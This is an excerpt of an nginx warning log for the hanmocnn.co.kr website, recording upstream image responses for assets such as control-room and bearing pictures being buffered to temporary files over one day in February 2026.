"https://www.hanmocnn.co.kr/" +2026/02/18 00:08:48 [warn] 943#943: *93146 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/98/0000015983 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 00:08:48 [warn] 943#943: *93146 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/98/0000015984 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 00:08:48 [warn] 943#943: *93146 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/98/0000015985 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 00:13:29 [warn] 940#940: *93161 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/98/0000015986 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 00:13:29 [warn] 940#940: *93161 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/98/0000015987 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 00:13:29 [warn] 940#940: *93161 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/98/0000015988 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 00:18:50 [warn] 941#941: *93176 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/98/0000015989 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 00:18:50 [warn] 941#941: *93176 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/99/0000015990 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 00:18:50 [warn] 941#941: *93176 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/99/0000015991 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 00:18:50 [warn] 941#941: *93176 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/99/0000015992 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 00:26:24 [warn] 942#942: *93219 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/99/0000015993 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 00:26:24 [warn] 942#942: *93219 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/99/0000015994 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 00:31:03 [warn] 942#942: *93243 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/99/0000015995 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 00:31:03 [warn] 942#942: *93243 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/99/0000015996 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 00:31:03 [warn] 942#942: *93243 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/99/0000015997 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 00:38:38 [warn] 942#942: *93259 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/99/0000015998 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/reactor.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 00:38:38 [warn] 942#942: *93259 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/99/0000015999 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 00:38:56 [warn] 942#942: *93259 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/00/0000016000 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 00:43:22 [warn] 942#942: *93319 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/00/0000016001 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/reactor.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 00:48:24 [warn] 942#942: *93334 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/00/0000016002 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 00:48:24 [warn] 942#942: *93334 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/00/0000016003 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 00:48:24 [warn] 942#942: *93334 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/00/0000016004 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 01:06:51 [warn] 939#939: *93397 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/00/0000016005 while reading upstream, client: 205.169.39.217, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 01:06:51 [warn] 939#939: *93397 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/00/0000016006 while reading upstream, client: 205.169.39.217, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 01:06:51 [warn] 939#939: *93397 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/00/0000016007 while reading upstream, client: 205.169.39.217, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 01:06:51 [warn] 939#939: *93397 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/00/0000016008 while reading upstream, client: 205.169.39.217, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 01:06:51 [warn] 939#939: *93397 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/00/0000016009 while reading upstream, client: 205.169.39.217, server: hanmocnn.co.kr, request: "GET /assets/images/reactor.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 01:06:51 [warn] 939#939: *93397 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/01/0000016010 while reading upstream, client: 205.169.39.217, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 01:06:51 [warn] 939#939: *93397 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/01/0000016011 while reading upstream, client: 205.169.39.217, server: hanmocnn.co.kr, request: "GET /assets/images/instrument.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/instrument.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 01:06:51 [warn] 939#939: *93397 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/01/0000016012 while reading upstream, client: 205.169.39.217, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 01:09:32 [warn] 939#939: *93413 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/01/0000016013 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 01:09:32 [warn] 939#939: *93413 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/01/0000016014 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 01:09:32 [warn] 939#939: *93413 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/01/0000016015 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 01:14:03 [warn] 939#939: *93430 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/01/0000016016 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 01:14:03 [warn] 939#939: *93430 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/01/0000016017 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 01:19:21 [warn] 939#939: *93446 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/01/0000016018 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 01:19:21 [warn] 939#939: *93446 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/01/0000016019 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 01:19:21 [warn] 939#939: *93446 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/02/0000016020 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 01:19:21 [warn] 939#939: *93446 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/02/0000016021 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 02:27:03 [warn] 943#943: *93497 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/02/0000016022 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 02:27:03 [warn] 943#943: *93497 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/02/0000016023 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/instrument.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/instrument.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 02:27:03 [warn] 943#943: *93497 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/02/0000016024 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/reactor.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 02:31:14 [warn] 943#943: *93510 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/02/0000016025 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 02:31:14 [warn] 943#943: *93510 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/02/0000016026 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 02:31:14 [warn] 943#943: *93510 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/02/0000016027 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 02:40:23 [warn] 943#943: *93561 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/02/0000016028 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 02:40:23 [warn] 943#943: *93561 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/02/0000016029 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 02:40:23 [warn] 943#943: *93561 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/03/0000016030 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 03:38:50 [warn] 941#941: *93665 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/03/0000016032 while reading upstream, client: 149.57.180.66, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 03:38:50 [warn] 941#941: *93665 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/03/0000016033 while reading upstream, client: 149.57.180.66, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 07:03:10 [warn] 952#952: *96830 using uninitialized "server" variable while logging request, client: 51.159.107.135, server: hanmocnn.co.kr, request: "HEAD / HTTP/1.1", host: "www.hanmocnn.co.kr:443" +2026/02/18 07:03:13 [warn] 952#952: *96831 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/52/0000017521 while reading upstream, client: 51.159.107.135, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 07:03:13 [warn] 952#952: *96831 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/52/0000017522 while reading upstream, client: 51.159.107.135, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 07:03:14 [warn] 952#952: *96831 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/52/0000017523 while reading upstream, client: 51.159.107.135, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 07:03:14 [warn] 952#952: *96831 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/52/0000017524 while reading upstream, client: 51.159.107.135, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 07:03:14 [warn] 952#952: *96831 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/52/0000017525 while reading upstream, client: 51.159.107.135, server: hanmocnn.co.kr, request: "GET /assets/images/reactor.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 07:03:14 [warn] 952#952: *96831 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/52/0000017526 while reading upstream, client: 51.159.107.135, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 07:03:14 [warn] 952#952: *96831 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/52/0000017527 while reading upstream, client: 51.159.107.135, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 07:03:14 [warn] 952#952: *96831 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/52/0000017528 while reading upstream, client: 51.159.107.135, server: hanmocnn.co.kr, request: "GET /assets/images/instrument.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/instrument.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 07:03:19 [warn] 952#952: *96846 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/52/0000017529 while reading upstream, client: 51.159.107.135, server: hanmocnn.co.kr, request: "GET /assets/images/favicon.ico HTTP/1.1", upstream: "http://192.168.0.250:8081/assets/images/favicon.ico", host: "www.hanmocnn.co.kr" +2026/02/18 11:02:30 [warn] 956#956: *97013 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/53/0000017530 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 11:03:58 [warn] 956#956: *97013 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/53/0000017531 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 11:03:58 [warn] 956#956: *97013 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/53/0000017532 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 11:05:50 [warn] 956#956: *97059 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/53/0000017533 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 11:05:50 [warn] 956#956: *97059 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/53/0000017534 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 11:05:50 [warn] 956#956: *97059 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/53/0000017535 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 11:08:58 [warn] 956#956: *98564 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/27/0000018279 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 11:08:58 [warn] 956#956: *98564 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/28/0000018280 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 11:08:58 [warn] 956#956: *98564 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/28/0000018281 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 11:10:42 [warn] 956#956: *98580 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/28/0000018282 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 11:10:42 [warn] 956#956: *98580 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/28/0000018283 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 11:10:42 [warn] 956#956: *98580 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/28/0000018284 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 11:51:49 [warn] 956#956: *98620 an upstream response is buffered to a temporary file 